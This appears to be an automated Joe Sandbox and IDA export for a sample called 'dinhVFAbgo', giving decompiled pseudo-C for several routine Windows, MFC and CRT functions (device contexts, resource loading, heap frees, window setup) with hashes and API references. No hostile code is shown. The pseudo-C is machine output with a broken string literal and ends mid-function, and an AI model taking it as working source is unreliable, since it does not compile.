Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: RectRedrawWindow$CaptureRelease
String ID:
API String ID: 1080614547-0
Opcode ID: fcadfc3177694615acdb4e81cc6217f591f991668103fc3a8e28cb914fd567c9
Instruction ID: f20eaf33f0d8e4375ccb8ac9a75cdacc247829ba4f4076ba90c48408b72757c0
Opcode Fuzzy Hash: fcadfc3177694615acdb4e81cc6217f591f991668103fc3a8e28cb914fd567c9
Instruction Fuzzy Hash: 7F011A71504B05FFDB215F62DC48F9B7BB9FB84B11F00881EF6EA92020DA31A559EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00D9E219 Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D9E219(void* _a4, void* _a8) {
				void* _t8;
				DEVMODEA* _t9;
				void* _t20;
				signed short* _t21;
				struct HDC__* _t22;

				if(_a4 == 0) {
					L8:
					return 0;
				}
				_t8 = GlobalLock(_a4);
				_t20 = _a8;
				_t21 = _t8;
				if(_t20 == 0) {
					_t9 = 0;
				} else {
					_t9 = GlobalLock(_t20);
				}
				if(_t21 == 0) {
					goto L8;
				} else {
					_t22 = CreateDCA(_t21 + ( *_t21 & 0x0000ffff), _t21 + (_t21[1] & 0x0000ffff), _t21 + (_t21[2] & 0x0000ffff), _t9);
					GlobalUnlock(_a4);
					if(_t20 != 0) {
						GlobalUnlock(_t20);
					}
					return _t22;
				}
			}

0x00d9e222
0x00d9e27a
0x00000000
0x00d9e27a
0x00d9e227
0x00d9e22d
0x00d9e230
0x00d9e234
0x00d9e23f
0x00d9e236
0x00d9e237
0x00d9e237
0x00d9e243
0x00000000
0x00d9e245
0x00d9e263
0x00d9e265
0x00d9e26d
0x00d9e270
0x00d9e270
0x00000000
0x00d9e276

APIs

GlobalLock.KERNEL32 ref: 00D9E227
GlobalLock.KERNEL32 ref: 00D9E237
CreateDCA.GDI32(?,?,?,00000000), ref: 00D9E25A
GlobalUnlock.KERNEL32(00000000,?,?,?,00D9E2EF,?,?,?,00D2171A,?,00000000,0014000C,00000000), ref: 00D9E265
GlobalUnlock.KERNEL32(00000000,?,?,?,00D9E2EF,?,?,?,00D2171A,?,00000000,0014000C,00000000), ref: 00D9E270

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Global$LockUnlock$Create
String ID:
API String ID: 2536725124-0
Opcode ID: 6ee6f72bb74a3bf63aa8eee311afef3bf2cd1be5b3a201d10b322abae2c82ab7
Instruction ID: 84241102664ead86e045b6f03a190a6671e68a6fc383dc6939426ebc023cc792
Opcode Fuzzy Hash: 6ee6f72bb74a3bf63aa8eee311afef3bf2cd1be5b3a201d10b322abae2c82ab7
Instruction Fuzzy Hash: CCF03136504620ABCB319F2ADC487BB7BBCAB54FA17188015FC99E2210EA35D854E7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00DFEA93 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00DFEA93(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xe68ef0; // 0xe68f44
					if(_t23 != 0) {
						E00DF47C5(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xe68ef4; // 0xe89374
					if(_t24 != 0) {
						E00DF47C5(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xe68ef8; // 0xe89374
					if(_t25 != 0) {
						E00DF47C5(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xe68f20; // 0xe68f48
					if(_t26 != 0) {
						E00DF47C5(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xe68f24; // 0xe89378
					if(_t27 != 0) {
						return E00DF47C5(_t6);
					}
				}
				return _t6;
			}

0x00dfea99
0x00dfea9e
0x00dfeaa2
0x00dfeaa8
0x00dfeaab
0x00dfeab0
0x00dfeab4
0x00dfeaba
0x00dfeabd
0x00dfeac2
0x00dfeac6
0x00dfeacc
0x00dfeacf
0x00dfead4
0x00dfead8
0x00dfeade
0x00dfeae1
0x00dfeae6
0x00dfeae7
0x00dfeaea
0x00dfeaf0
0x00000000
0x00dfeaf8
0x00dfeaf0
0x00dfeafb

APIs

_free.LIBCMT ref: 00DFEAAB

Part of subcall function 00DF47C5: HeapFree.KERNEL32(00000000,00000000,?,00DFED34,?,00000000,?,00000001,?,00DFEFD7,?,00000007,?,?,00DFF47C,?), ref: 00DF47DB
Part of subcall function 00DF47C5: GetLastError.KERNEL32(?,?,00DFED34,?,00000000,?,00000001,?,00DFEFD7,?,00000007,?,?,00DFF47C,?,?), ref: 00DF47ED

_free.LIBCMT ref: 00DFEABD
_free.LIBCMT ref: 00DFEACF
_free.LIBCMT ref: 00DFEAE1
_free.LIBCMT ref: 00DFEAF3

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b2eda7048b17b804555504ea631a9a36039c6d9618aec4937240e8eef46941fa
Instruction ID: 865f58d1cfb6e684634bbdebc3bd7d05041a366ca17454a64805944f62826fe5
Opcode Fuzzy Hash: b2eda7048b17b804555504ea631a9a36039c6d9618aec4937240e8eef46941fa
Instruction Fuzzy Hash: 2EF09632500228BB9624EB99FAC1C3B73E9FB4475075A8905F308E7521DFB1FC804AB4

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2712 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00CF2712(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed short _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				long long _v20;
				signed short* _v24;
				signed int _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				long long _v40;
				intOrPtr _v48;
				char _v60;
				char _v64;
				void* __ebp;
				void* _t86;
				struct HRSRC__* _t92;
				signed int _t93;
				void* _t94;
				signed int _t96;
				intOrPtr _t98;
				signed int _t99;
				long long _t100;
				signed int _t110;
				signed int _t112;
				intOrPtr* _t114;
				signed char _t121;
				void* _t122;
				intOrPtr _t123;
				intOrPtr _t124;
				struct HINSTANCE__* _t126;
				intOrPtr* _t128;
				signed int _t134;
				intOrPtr _t135;
				intOrPtr _t137;
				signed int _t138;
				signed int _t146;
				signed int _t147;
				intOrPtr _t148;
				signed short* _t149;
				intOrPtr* _t151;
				intOrPtr _t153;
				signed short _t155;
				intOrPtr _t158;
				intOrPtr _t159;
				void* _t167;
				long long _t185;

				_t128 = __ecx;
				_t125 = __ebx;
				_push(__ebx);
				_push(__esi);
				_t155 = _a4;
				_push(__edi);
				_t151 = __ecx;
				_v32 = __ecx;
				_t164 = _t155;
				if(_t155 == 0) {
					L39:
					E00CAA4E7(_t125, _t128, _t151, _t155, __eflags);
					asm("int3");
					_push(_t128);
					_push(_t128);
					_t86 = E00CF137B(_t128, _t146, __eflags, _v48,  &_v64,  &_v60);
					__eflags = _t86;
					if(_t86 != 0) {
						 *_a4 =  *((intOrPtr*)(_t86 + 4));
						__eflags = 1;
						return 1;
					}
					return _t86;
				} else {
					_t126 =  *(E00CACEEE(__ebx, __ecx, _t155, _t164) + 0xc);
					_t92 = FindResourceW(_t126, _t155 & 0x0000ffff, 0xf1);
					if(_t92 == 0) {
						L38:
						_t93 = 0;
						goto L37;
					} else {
						_t94 = LoadResource(_t126, _t92);
						if(_t94 == 0) {
							goto L38;
						} else {
							_t125 = LockResource(_t94);
							_t167 = _t125;
							if(_t167 == 0) {
								goto L38;
							} else {
								_t96 =  *(_t125 + 6) & 0x0000ffff;
								_t147 = 4;
								_t146 = _t96 * _t147 >> 0x20;
								_push( ~(0 | _t167 > 0x00000000) | _t96 * _t147);
								_t98 = E00CA95C0(_t167);
								_v12 = _t98;
								_pop(_t128);
								if(_t98 == 0) {
									goto L39;
								} else {
									_t99 =  *(_t125 + 2) & 0x0000ffff;
									_t134 =  *(_t125 + 4) & 0x0000ffff;
									_v28 = _t99;
									_t100 = _t99 + 6;
									_v24 = _t134;
									_t135 = _t134 + 6;
									_v8 = _t100;
									_v40 = _t100;
									_v16 = _t135;
									_v36 = _t135;
									if(_a12 == 0) {
										_t148 =  *0xe87370; // 0x0
									} else {
										_t148 =  *((intOrPtr*)(_t151 + 0xc30));
									}
									if(_t148 == 0) {
										_t121 = E00CC19ED();
										asm("fld1");
										if( *((intOrPtr*)(_t121 + 0x1e8)) == 0) {
											_t185 = st0;
										} else {
											_t185 =  *((long long*)(_t121 + 0x1e0));
										}
										asm("fucompp");
										asm("fnstsw ax");
										if((_t121 & 0x00000044) != 0) {
											_t135 = _v16;
										} else {
											_t122 = E00CC19ED();
											if( *((intOrPtr*)(_t122 + 0x1e8)) == 0) {
												asm("fld1");
											} else {
												_t185 =  *((long long*)(_t122 + 0x1e0));
											}
											asm("fild dword [ebp-0x24]");
											_v20 = _t185;
											asm("fxch st0, st1");
											_t123 = L00DDD790(_t148);
											asm("fild dword [ebp-0x20]");
											_v8 = _t123;
											_v40 =  *0xe19bf8 + st0;
											_t185 = _v40;
											asm("fmulp st2, st0");
											asm("faddp st1, st0");
											_t124 = L00DDD790(_t148);
											_t135 = _t124;
											_v16 = _t124;
										}
										_t100 = _v8;
									}
									if(_a12 == 0) {
										__eflags = L00CDD486(0xe87460);
										if(__eflags == 0) {
											E00CF8BC6(_t125, 0xe87460, _t151, _t185, _v8, _v16, _v28, _v24);
										}
									} else {
										E00CF887F(_t151, _t185, _t100, _t135, _v28, _v24, 0);
									}
									_t137 = _a8;
									_v28 = 1;
									if( *(_t137 + 4) == 0) {
										 *(_t137 + 4) = _t155;
									}
									if( *(_t151 + 0xd18) != 0) {
										L27:
										_t138 = 0;
										_v16 =  *((intOrPtr*)(_t151 + 0xc04));
										_v28 = 0;
										if(0 <  *(_t125 + 6)) {
											_t158 = _v12;
											_t55 = _t125 + 8; // 0x8
											_t149 = _t55;
											_t153 = _v16;
											_v24 = _t149;
											do {
												_t112 =  *_t149 & 0x0000ffff;
												 *(_t158 + _t138 * 4) = _t112;
												if(_a12 == 0 && _t112 != 0) {
													_t159 = _t153;
													_t153 = _t153 + 1;
													_t114 = E00CD5246(_t125, _t149, _t153, _t153, _t112);
													_t138 = _v28;
													_t149 = _v24;
													 *_t114 = _t159;
													_t158 = _v12;
												}
												_t138 = _t138 + 1;
												_t149 =  &(_t149[1]);
												_v28 = _t138;
												_v24 = _t149;
											} while (_t138 < ( *(_t125 + 6) & 0x0000ffff));
											_t151 = _v32;
										}
										 *(_t151 + 0xd18) = _a4;
										 *0xe17a64(_v12,  *(_t125 + 6) & 0x0000ffff, 1);
										_t110 =  *((intOrPtr*)( *((intOrPtr*)( *_t151 + 0x33c))))();
										_v28 = _t110;
										if(_t110 == 0) {
											 *(_t151 + 0xd18) =  *(_t151 + 0xd18) & _t110;
										}
									} else {
										 *0xe17a64(_t137, _a12);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t151 + 0x334))))() != 0) {
											goto L27;
										}
									}
									L00CA95BB(_v12);
									_t93 = _v28;
									L37:
									return _t93;
								}
							}
						}
					}
				}
			}

0x00cf2712
0x00cf2712
0x00cf2718
0x00cf2719
0x00cf271a
0x00cf271d
0x00cf271e
0x00cf2720
0x00cf2723
0x00cf2725
0x00cf2961
0x00cf2961
0x00cf2966
0x00cf296a
0x00cf296b
0x00cf2977
0x00cf297c
0x00cf297e
0x00cf2986
0x00cf298a
0x00000000
0x00cf298a
0x00cf298c
0x00cf272b
0x00cf2735
0x00cf273d
0x00cf2745
0x00cf295d
0x00cf295d
0x00000000
0x00cf274b
0x00cf274d
0x00cf2755
0x00000000
0x00cf275b
0x00cf2762
0x00cf2764
0x00cf2766
0x00000000
0x00cf276c
0x00cf276c
0x00cf2774
0x00cf2775
0x00cf277e
0x00cf277f
0x00cf2784
0x00cf2787
0x00cf278a
0x00000000
0x00cf2790
0x00cf2790
0x00cf2794
0x00cf2798
0x00cf279b
0x00cf279e
0x00cf27a1
0x00cf27a8
0x00cf27ab
0x00cf27ae
0x00cf27b1
0x00cf27b4
0x00cf27be
0x00cf27b6
0x00cf27b6
0x00cf27b6
0x00cf27c6
0x00cf27c8
0x00cf27cd
0x00cf27d6
0x00cf27e0
0x00cf27d8
0x00cf27d8
0x00cf27d8
0x00cf27e2
0x00cf27e4
0x00cf27e9
0x00cf2839
0x00cf27eb
0x00cf27eb
0x00cf27f7
0x00cf2801
0x00cf27f9
0x00cf27f9
0x00cf27f9
0x00cf2803
0x00cf2806
0x00cf2816
0x00cf2818
0x00cf281d
0x00cf2820
0x00cf2823
0x00cf2826
0x00cf2829
0x00cf282b
0x00cf282d
0x00cf2832
0x00cf2834
0x00cf2834
0x00cf283c
0x00cf283c
0x00cf2843
0x00cf2862
0x00cf2864
0x00cf2873
0x00cf2873
0x00cf2845
0x00cf2851
0x00cf2851
0x00cf2878
0x00cf287b
0x00cf2886
0x00cf2888
0x00cf2888
0x00cf2892
0x00cf28b4
0x00cf28ba
0x00cf28bc
0x00cf28c1
0x00cf28c8
0x00cf28ca
0x00cf28cd
0x00cf28cd
0x00cf28d0
0x00cf28d3
0x00cf28d6
0x00cf28da
0x00cf28dd
0x00cf28e0
0x00cf28e6
0x00cf28ee
0x00cf28ef
0x00cf28f4
0x00cf28f7
0x00cf28fa
0x00cf28fc
0x00cf28fc
0x00cf2903
0x00cf2904
0x00cf2907
0x00cf290a
0x00cf290d
0x00cf2911
0x00cf2911
0x00cf2917
0x00cf2933
0x00cf293b
0x00cf293d
0x00cf2942
0x00cf2944
0x00cf2944
0x00cf2894
0x00cf28a2
0x00cf28ae
0x00000000
0x00000000
0x00cf28ae
0x00cf294d
0x00cf2952
0x00cf2956
0x00cf295a
0x00cf295a
0x00cf278a
0x00cf2766
0x00cf2755
0x00cf2745

APIs

FindResourceW.KERNEL32(?,00000000,000000F1), ref: 00CF273D
LoadResource.KERNEL32(?,00000000), ref: 00CF274D
LockResource.KERNEL32(00000000), ref: 00CF275C

Strings

`t, xrefs: 00CF2858

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Resource$FindLoadLock
String ID: `t
API String ID: 2752051264-3481165120
Opcode ID: 51200524957d4d85eb776bc4af6b145e159c324c598ee97faa1ee03e489059d5
Instruction ID: 8c93f12ca6d21c7c00783d855059f0431d2741f1f03816c0b13338f48b1a9ad9
Opcode Fuzzy Hash: 51200524957d4d85eb776bc4af6b145e159c324c598ee97faa1ee03e489059d5
Instruction Fuzzy Hash: 83719D71A0020AABCF44DFA5C9456BEBBF4FF08340F24406AEA15A7291DB749E41DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CED136 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 193COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CED13D
FillRect.USER32 ref: 00CED2C8

Part of subcall function 00D0BD04: __EH_prolog3_GS.LIBCMT ref: 00D0BD0B
Part of subcall function 00D0BD04: CreateCompatibleDC.GDI32(00000000), ref: 00D0BD6F
Part of subcall function 00D0BD04: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00D0BDA5
Part of subcall function 00D0BD04: SelectObject.GDI32(?,00000000), ref: 00D0BDF9

Strings

\, xrefs: 00CED14A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CompatibleCreateH_prolog3_$BitmapFillObjectRectSelect
String ID: \
API String ID: 912734472-2545358515
Opcode ID: b2c205453d5290acdfeac46a830ad72a5698db104f4a4ff1237e9249e140a288
Instruction ID: c561b5c14cda9b954a52db1abef5e855fdb5dbbfbd8691bd4c226515d4eadd67
Opcode Fuzzy Hash: b2c205453d5290acdfeac46a830ad72a5698db104f4a4ff1237e9249e140a288
Instruction Fuzzy Hash: C2614C31A04619DFCF01EFA1CD95AED77B6BF05310F044165F916AB2A2CB71AE0ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CE0856 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00CE0856(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				struct tagRECT _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				signed int _v68;
				long _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t70;
				intOrPtr _t86;
				intOrPtr _t89;
				void* _t99;
				void* _t105;
				intOrPtr* _t117;
				intOrPtr* _t120;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr _t151;
				void* _t152;
				signed int _t160;

				_t147 = __edx;
				_t70 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t70 ^ _t160;
				_v40 = _a8;
				_t120 = __ecx;
				_t153 = _a24;
				_v36 = _a12;
				_t149 = _a28;
				_v52 = _a20;
				_v32 = _a24;
				_v28 = _t149;
				_v48 = _a36;
				 *((intOrPtr*)(__ecx + 0x8c)) = E00CACB0B(_a24, 0xe19e40);
				if( *((intOrPtr*)(__ecx + 0x94)) != 0 && E00D537D5(0xe6872c, __edx, _t153) == 0) {
					_t117 = E00D537D5(0xe6872c, __edx, E00CD8851(__edx, _t153));
					_v44 = _t117;
					if(_t117 != 0) {
						 *0xe17a64(_t149, 1);
						 *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x24))))();
					}
				}
				_t150 =  *_t120;
				 *(_t120 + 0x80) =  *(_t120 + 0x80) & 0x10000000;
				 *0xe17a64();
				 *0xe17a64( *((intOrPtr*)( *((intOrPtr*)(_t150 + 0x1c0))))() | _a16);
				 *((intOrPtr*)( *((intOrPtr*)(_t150 + 0x1e4))))();
				 *((intOrPtr*)(_t120 + 0xa0)) = _a32;
				_t166 =  *((intOrPtr*)(_t120 + 0xc4));
				if( *((intOrPtr*)(_t120 + 0xc4)) == 0) {
					_t151 = _v32;
					_t157 = E00CB216F(_t120, _a4, _v40, _v36, _a16, _v52, _t151, _v28, _v48);
					__eflags = _t157;
					if(_t157 == 0) {
						goto L17;
					}
					goto L13;
				} else {
					E00DDFBE0(_t150,  &_v100, 0, 0x30);
					_v60 = _v40;
					_v64 = _v36;
					_v68 = _a16 | 0x40000000;
					_v92 = _v28;
					_t99 = E00CACEEE(_t120, _t150, 0, _t166);
					_t151 = _v32;
					_v96 =  *((intOrPtr*)(_t99 + 8));
					if(_t151 != 0) {
						_v88 =  *((intOrPtr*)(_t151 + 0x20));
					} else {
						_v88 = 0;
					}
					_t157 =  *((intOrPtr*)( *_t120 + 0x64));
					 *0xe17a64( &_v100);
					_t105 =  *((intOrPtr*)( *((intOrPtr*)( *_t120 + 0x64))))();
					_t168 = _t105;
					if(_t105 == 0 || E00CBD212(_t120, _t147, _t168,  *((intOrPtr*)(_t120 + 0xc4)), _t151) == 0) {
						_t86 = 0;
						goto L18;
					} else {
						SetClassLongA( *(_t120 + 0x20), 0xfffffff6, GetSysColorBrush(0xf));
						E00CB79D1(_t120, _v28);
						_v24.left = 0;
						_v24.top = 0;
						_v24.right = 0;
						_v24.bottom = 0;
						GetWindowRect( *(_t120 + 0x20),  &_v24);
						_t157 = 1;
						 *((intOrPtr*)(_t120 + 0xc8)) = _v24.right - _v24.left;
						 *((intOrPtr*)(_t120 + 0xcc)) = _v24.bottom - _v24.top;
						L13:
						if(E00CACB0B(_t151, ?str?) == 0) {
							_t89 = E00CD8851(_t147, _t151);
						} else {
							_t89 = _t151;
						}
						 *((intOrPtr*)(_t120 + 0xa4)) = E00CACA6C("$?\xef\xbf\xbd"						 *((intOrPtr*)(_t120 + 0x8c)) = E00CACB0B(_t151, 0xe19e40);
						L17:
						_t86 = _t157;
						L18:
						_pop(_t152);
						return E00DDCBCE(_t86, _t120, _v8 ^ _t160, _t147, _t152, _t157);
					}
				}
			}

0x00ce0856
0x00ce085c
0x00ce0863
0x00ce086a
0x00ce086d
0x00ce0873
0x00ce0878
0x00ce087f
0x00ce0882
0x00ce088d
0x00ce0890
0x00ce0893
0x00ce08a2
0x00ce08a8
0x00ce08c6
0x00ce08cb
0x00ce08d0
0x00ce08dc
0x00ce08e5
0x00ce08e5
0x00ce08d0
0x00ce08e7
0x00ce08e9
0x00ce08fb
0x00ce0911
0x00ce0919
0x00ce0920
0x00ce0926
0x00ce092c
0x00ce0a03
0x00ce0a22
0x00ce0a24
0x00ce0a26
0x00000000
0x00000000
0x00000000
0x00ce0932
0x00ce0939
0x00ce0944
0x00ce094a
0x00ce0955
0x00ce095b
0x00ce095e
0x00ce0963
0x00ce0969
0x00ce096e
0x00ce0978
0x00ce0970
0x00ce0970
0x00ce0970
0x00ce097d
0x00ce0986
0x00ce098e
0x00ce0990
0x00ce0992
0x00ce09fc
0x00000000
0x00ce09a6
0x00ce09b4
0x00ce09bf
0x00ce09c6
0x00ce09c9
0x00ce09cc
0x00ce09cf
0x00ce09d9
0x00ce09ed
0x00ce09ee
0x00ce09f4
0x00ce0a28
0x00ce0a36
0x00ce0a3d
0x00ce0a38
0x00ce0a38
0x00ce0a38
0x00ce0a57
0x00ce0a62
0x00ce0a68
0x00ce0a68
0x00ce0a6a
0x00ce0a6d
0x00ce0a78
0x00ce0a78
0x00ce0992

APIs

GetSysColorBrush.USER32(0000000F), ref: 00CE09A8
SetClassLongA.USER32(?,000000F6,00000000), ref: 00CE09B4
GetWindowRect.USER32 ref: 00CE09D9

Strings

$?, xrefs: 00CE0A28, 00CE0A44

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: BrushClassColorLongRectWindow
String ID: $?
API String ID: 3059706247-773356789
Opcode ID: e74b689315ec82a61a2525e002b3a4a9973a984daec83a82b94d853c5e32cde3
Instruction ID: 9e4cfb2f77cf4414586c5f43a8e4ba11cdd897cf0dcac30b4a0696c26f9b5901
Opcode Fuzzy Hash: e74b689315ec82a61a2525e002b3a4a9973a984daec83a82b94d853c5e32cde3
Instruction Fuzzy Hash: DC613871A002199FCF04DFA9D995AAEBBF5FF48700F14416AE905EB341DB709A00DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CEA6EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E00CEA6EB(void* __ebx, signed int __edi, signed int __esi, void* __eflags, void* __fp0) {
				signed int _t78;
				void* _t82;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t103;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t146;
				signed int _t147;
				signed int _t151;
				intOrPtr _t156;
				void* _t157;
				intOrPtr _t158;

				_t152 = __esi;
				_t148 = __edi;
				_push(0x34);
				E00DDD55F(0xe0b1bc, __ebx, __edi, __esi);
				_t122 =  *((intOrPtr*)(_t157 + 0x28));
				_t121 =  *((intOrPtr*)(_t157 + 8));
				 *((intOrPtr*)(_t157 - 0x24)) = _t122;
				if( *(_t157 + 0x20) != 0) {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t152 =  *(_t157 + 0x24);
					_t148 = 0;
					_t78 = ( *((intOrPtr*)(_t157 + 0x18)) -  *((intOrPtr*)(_t157 + 0x10))) * _t152;
					asm("cdq");
					_t146 = _t78 %  *(_t157 + 0x20);
					_t162 =  *((intOrPtr*)(_t157 + 0x2c)) - 0xffffffff;
					 *((intOrPtr*)(_t157 - 0x18)) = _t78 /  *(_t157 + 0x20) +  *((intOrPtr*)(_t157 + 0x10));
					if( *((intOrPtr*)(_t157 + 0x2c)) != 0xffffffff) {
						E00D0A290(_t157 - 0x34, _t121);
						_push(0);
						_push(0);
						_push(0);
						_push( *((intOrPtr*)(_t157 + 0x2c)));
						 *(_t157 - 4) = 0;
						_push( *((intOrPtr*)(_t157 - 0x24)));
						_t148 = _t158;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t82 = L00D0C9FB(_t121, _t157 - 0x34, _t146, _t158, _t157 - 0x20, __eflags, __fp0);
						_t31 = _t157 - 4;
						 *_t31 =  *(_t157 - 4) | 0xffffffff;
						__eflags =  *_t31;
						E00D0A2A5(_t82, _t157 - 0x34);
						_t152 =  *(_t157 + 0x24);
					} else {
						_push(_t122);
						E00CB8F99(_t157 - 0x40, _t146, 0, _t152, _t162);
						FillRect( *(_t121 + 4), _t157 - 0x20,  *(_t157 - 0x3c));
						 *((intOrPtr*)(_t157 - 0x40)) = 0xe1966c;
						E00CB91F0(_t157 - 0x40, _t146);
					}
					if( *((intOrPtr*)(_t157 + 0x34)) != 0) {
						E00CA67E1(_t157 - 0x24);
						 *(_t157 - 4) = 1;
						asm("cdq");
						_t147 = _t152 * 0x64 %  *(_t157 + 0x20);
						E00CA6953(_t157 - 0x24, "%d%%", _t152 * 0x64 /  *(_t157 + 0x20));
						 *0xe17a64( *((intOrPtr*)(E00CC19ED() + 0x68)));
						_t93 =  *( *( *_t121 + 0x30))();
						_t156 =  *((intOrPtr*)(_t157 - 0x24));
						 *((intOrPtr*)(_t157 - 0x38)) = _t93;
						_t94 = _t156 - 0x10;
